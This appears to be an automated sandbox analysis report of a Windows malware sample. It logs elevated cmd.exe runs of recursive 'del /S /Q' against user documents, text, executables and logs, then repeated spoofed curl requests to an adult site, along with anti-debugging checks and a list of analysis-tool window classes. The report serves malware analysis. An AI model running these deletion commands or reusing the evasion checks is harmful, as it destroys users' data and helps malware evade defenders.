      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:58:48
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:58:54
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:58:59
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:04
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:10
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:13
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:17
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:21
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:25
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:30
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:33
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:37
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:42
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:42
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:43
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:43
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:44
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:45
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:46
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:47
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:47
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:48
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:49
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:49
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:50
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:50
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:51
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:51
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:52
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:52
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:53
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:53
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:54
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:54
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:55
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:55
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:56
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:57
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:57
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:58
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:58
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:59
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:59
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:59:59
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:00:00
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:00:00
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:00:01
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:00:02
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):
      Commandline:C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
      Imagebase:
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Disassembly

      Code Analysis

      Reset < >

        Executed Functions

        APIs
        • 72A73930.VCRUNTIME140(?,00000000), ref: 009C1100
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C110C
        • Process32First.KERNEL32(00000000,?), ref: 009C1125
        • 76A06610.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 009C119E
        • Process32Next.KERNEL32(?,?), ref: 009C11BB
        • GetClassNameA.USER32(?,?,00000400), ref: 009C12B1
        • 76A06610.API-MS-WIN-CRT-STRING-L1-1-0(009C3140,?), ref: 009C12DE
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID: A06610Process32$A73930ClassCreateFirstNameNextSnapshotToolhelp32
        • String ID: Autoruns$CNetmonMainFrame$FilemonClass$OllyDbg$PROCEXPL$PROCMON_WINDOW_CLASS$ProcessHacker$RegmonClass$SmartSniff$TCPViewClass$TFormFileAlyzer2$TIdaWindow$WinDbgFrameClass
        • API String ID: 1912663101-3132329589
        • Opcode ID: 44f7e2402a0267d189170ae21010163405b4d9049f7c7fe18b7f163b07620c96
        • Instruction ID: 3a63068e96e61e1eb3001e4d2f73afa20cfb441aa5bd6a77c610eb8d6e9121fe
        • Opcode Fuzzy Hash: 44f7e2402a0267d189170ae21010163405b4d9049f7c7fe18b7f163b07620c96
        • Instruction Fuzzy Hash: 5451B4B1D083089FD720DF159C45FEAB7F8EF86304F4485ADEA4897242D7709A49CB9A
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • 72A73930.VCRUNTIME140(?,00000000,00000044,009C1320), ref: 009C14D2
        • 72A73930.VCRUNTIME140(?,00000000,00000078,?,00000000,00000044,009C1320), ref: 009C14EA
        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,009C1320), ref: 009C1521
        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 009C156C
        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,009C1320), ref: 009C157E
        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,009C1320), ref: 009C1586
        • 769F8030.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,009C1320), ref: 009C158A
        • Sleep.KERNELBASE(00003E80), ref: 009C15D5
        • 769F8030.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 009C15ED
          • Part of subcall function 009C10D0: 72A73930.VCRUNTIME140(?,00000000), ref: 009C1100
          • Part of subcall function 009C10D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C110C
          • Part of subcall function 009C10D0: Process32First.KERNEL32(00000000,?), ref: 009C1125
          • Part of subcall function 009C10D0: 76A06610.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 009C119E
          • Part of subcall function 009C10D0: Process32Next.KERNEL32(?,?), ref: 009C11BB
        • EnumWindows.USER32(009C1200,00000000), ref: 009C16A3
        • CreateFileA.KERNELBASE(\\.\Global\ProcmonDebugLogger,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009C16C6
        • IsDebuggerPresent.KERNEL32 ref: 009C16D5
        • GetCurrentProcess.KERNEL32(?), ref: 009C1712
        • CheckRemoteDebuggerPresent.KERNELBASE(00000000), ref: 009C1719
        • Sleep.KERNELBASE(00001388), ref: 009C184B
        • CloseHandle.KERNEL32(00000000), ref: 009C199A
        Strings
        Memory Dump Source
